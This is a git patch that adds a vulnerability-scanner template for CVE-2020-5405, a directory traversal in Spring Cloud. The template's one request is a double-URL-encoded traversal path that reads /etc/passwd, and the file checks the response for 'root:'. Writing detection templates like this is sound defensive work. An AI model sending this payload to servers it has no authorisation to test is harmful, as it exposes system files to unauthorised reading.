From ebcf1ec0f669f30cfc3aed94ebffa00679aaa96c Mon Sep 17 00:00:00 2001
From: Harsh Bothra <66528650+harsh-bothra@users.noreply.github.com>
Date: Mon, 6 Jul 2020 21:52:18 +0530
Subject: [PATCH] Create CVE-2020-5405.yaml

Spring Cloud Directory Traversal
---
 cves/CVE-2020-5405.yaml | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 cves/CVE-2020-5405.yaml

diff --git a/cves/CVE-2020-5405.yaml b/cves/CVE-2020-5405.yaml
new file mode 100644
index 0000000000..9871bd3ef8
--- /dev/null
+++ b/cves/CVE-2020-5405.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-5405
+
+info:
+  name: Spring Cloud Directory Traversal
+  author: Harsh Bothra
+  severity: High
+
+# source:- https://nvd.nist.gov/vuln/detail/CVE-2020-5405
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
+
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "root:"